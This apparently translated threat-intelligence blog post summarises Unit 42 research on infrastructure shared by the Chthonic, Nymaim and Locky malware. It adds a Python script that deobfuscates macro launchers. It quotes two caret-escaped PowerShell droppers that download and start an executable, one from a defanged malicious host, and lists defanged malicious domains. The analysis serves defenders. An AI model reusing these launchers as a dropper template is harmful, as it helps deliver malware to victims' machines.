Recently security vendors have exposed a large number of malicious URLs and IP addresses. For example, when Palo Alto Networks analyzed malware that uses PowerShell, it uncovered the "infrastructure" shared by Trojans such as Chthonic and Nymaim.
Malicious PowerShell is usually launched from Microsoft Office documents carrying VBA macros, and then downloads and executes the "real" malware. But a recently found sample downloads its file from the Notepad++ site: Chthonic ~! ~!
cMd.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='%ap';$uy='pdat';$ji='a%.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli'; Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://notepad-plus-plus[.]org/repository/7.x/7.4.2/npp.7.4.2.Installer.exe'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"
Chthonic uses the above code to download a file from the legitimate Notepad++ website.
By pivoting on the variable names in the PowerShell command, Jeff White eventually found 171 document samples, all of them recent and sharing the same "bait" theme, and extracted 24 payload download URLs from them.
A sample compiled in August used a Polish bait document and even contained a Polish string: "Do you really think I'm not a virus?"
cMd.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='%ap';$uy='pdat';$ji='a%.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli'; Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://farhenzel[.]co/gls.exe'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"
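As an added worked example (not code from the article or from Unit 42), the following Python script undoes the obfuscation of the two launchers above: it strips the cmd.exe caret escapes, collects the $var='...' fragments, and rebuilds the string that Invoke-Expression would have run, recovering the download URL and the set of variable names that Jeff White pivoted on. LAUNCHER is a constructed copy of the first command, with the URL left defanged.

```python
import re

# Constructed copy of the first launcher quoted above (URL kept defanged); the string is
# split across Python literals only for readability, the parsing below is added here.
LAUNCHER = (
    'cMd.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s '
    "$fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';"
    "$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='%ap';$uy='pdat';$ji='a%.ex';$pol='em.ne';$oe='e''';"
    "$jik='rt-pro';$naw='cess ''';$lim='bcli'; Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem"
    "+$sad+$hit+$nim+'https://notepad-plus-plus[.]org/repository/7.x/7.4.2/npp.7.4.2.Installer.exe'"
    '+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"'
)

# A PowerShell single-quoted literal; inside it '' stands for one literal quote.
QUOTED = r"'((?:[^']|'')*)'"
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*" + QUOTED)
TERM_RE = re.compile(r"\$(\w+)|" + QUOTED)
IEX_RE = re.compile(r"Invoke-Expression\s*\((.*)\)", re.IGNORECASE | re.DOTALL)

def strip_carets(cmdline):
    """cmd.exe consumes '^' as an escape before PowerShell sees the text, so drop it."""
    return cmdline.replace("^", "")

def unquote(literal):
    return literal.replace("''", "'")

def deobfuscate(cmdline):
    """Return the reconstructed command, the download URL and the variable-name fingerprint."""
    ps = strip_carets(cmdline)
    variables = {name: unquote(val) for name, val in ASSIGN_RE.findall(ps)}
    m = IEX_RE.search(ps)
    if not m:
        raise ValueError("no Invoke-Expression() call found")
    pieces = []
    for var, lit in TERM_RE.findall(m.group(1)):
        pieces.append(variables.get(var, "$" + var) if var else unquote(lit))
    command = "".join(pieces)
    url = re.search(r"https?://[^'\s]+", command)
    return {
        "command": command,
        "url": url.group(0) if url else None,
        # Sorted variable names: the article notes these recur across the 171 documents,
        # which makes them a usable hunting pivot even when the URL changes.
        "fingerprint": tuple(sorted(variables)),
    }

if __name__ == "__main__":
    result = deobfuscate(LAUNCHER)
    print(result["command"])
    print("payload URL:", result["url"], "| variables:", " ".join(result["fingerprint"]))
```

Running it prints the plain DownloadFile/Start-Process command that the fragments hide; feeding the second launcher in gives the same command with the farhenzel[.]co URL.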
After going through all 171 samples, a list of hashes of the downloaded files was obtained. There are fewer distinct payloads than samples, which means many documents download the same payload. These payloads carry the following PDB strings.
Once the file is downloaded and executed, the new process launches a legitimate executable such as msiexec.exe and injects code into it.
This injected code then downloads further payloads through POST requests to various websites. These HTTP requests match the known pattern of the banking Trojan Chthonic, a Zeus variant.
Palo Alto highlights three major events in July involving the following sites:
ejtmjealr[.]com
gefinsioje[.]com
gesofgamd[.]com
ponedobla[.]bit
For the above four sites, they found more than 5520 samples making HTTP requests to them, and these samples have been identified as another downloader Trojan, Nymaim ~! ~!
And 'ejtmjealr[.]com' is very similar to 'ejdqzkd[.]com'; Talos has previously discussed in detail how Nymaim uses these domains.
Analyzing the above domains with Maltego and PassiveTotal turned up a total of 707 related IP addresses.
Reverse DNS was then used to discover more sites associated with them. Further analysis found that this "infrastructure" was also used to distribute other malware families, such as Locky.
The same "infrastructure" also hosts illegal services such as underground forums, and some of it is used by the malware Hancitor.
Some of these also involve, for example:
premarket[.]ws and similar domain names, used for illegal services;
slilpp[.]ws, offering quick review of accounts and user names, similar to the typical Nigerian cybercrime model;
...
At present, the 707 IP addresses and 2611 domain names have been published on GitHub:
https://github.com/pan-unit42/iocs/tree/master/notepadcase
S thinks: malware can be related along many dimensions, but for attributing cybercrime, use of the same C&C servers and the same network behavior is a relatively direct chain of evidence ~!
But this case also illustrates, from another perspective:
Because the domain names, C&C servers and other resources that cybercrime requires are important "assets" for any hacker or criminal organization, sharing basic infrastructure resources becomes the first choice for such organizations in an era where cybercrime is gradually going "international".
This kind of infrastructure sharing between hackers and organizations can be dragged down by some low-level individuals, as in this case.
On the other hand, in such a case, malware that uses the same resources (domain names, C&C servers, etc.) is hard to prove to come from the same hacker or organization ~!
What is worth celebrating is that this action will in any case have an important impact on some hackers and organizations ~!
At the same time, analysis of the above addresses and domain names, the associated malware, and the "black hands" behind them can continue; keep it up, everyone ~!
Malwarebenchmark is also keeping an eye on some of the above address and domain name resources. Friends with information are welcome to get in touch! See also our July analysis of Nigerian phishing in this subscription account:
Alarm: Nigerian phishing is threatening global industrial enterprises
Reference resources:
https://www.cert.pl/en/news/single/nymaim-revisited/
https://researchcenter.paloaltonetworks.com/2017/08/unit42-the-curious-case-of-notepad-and-chthonic-exposing-a-malicious-infrastructure/